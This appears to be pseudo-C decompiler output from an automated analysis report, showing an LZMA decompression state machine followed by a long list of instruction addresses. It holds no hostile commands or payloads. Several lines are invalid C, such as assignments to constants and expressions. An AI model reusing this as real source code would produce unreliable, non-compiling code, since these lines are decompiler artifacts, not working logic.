					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405ead
0x00405eb4
0x00405eba
0x00405ec0
0x00000000
0x00405ec4
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efb
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f46
0x00405f49
0x00405f71
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f63
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fba
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fdc
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406022
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066ca
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406700
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x00406728
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x004060bc
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
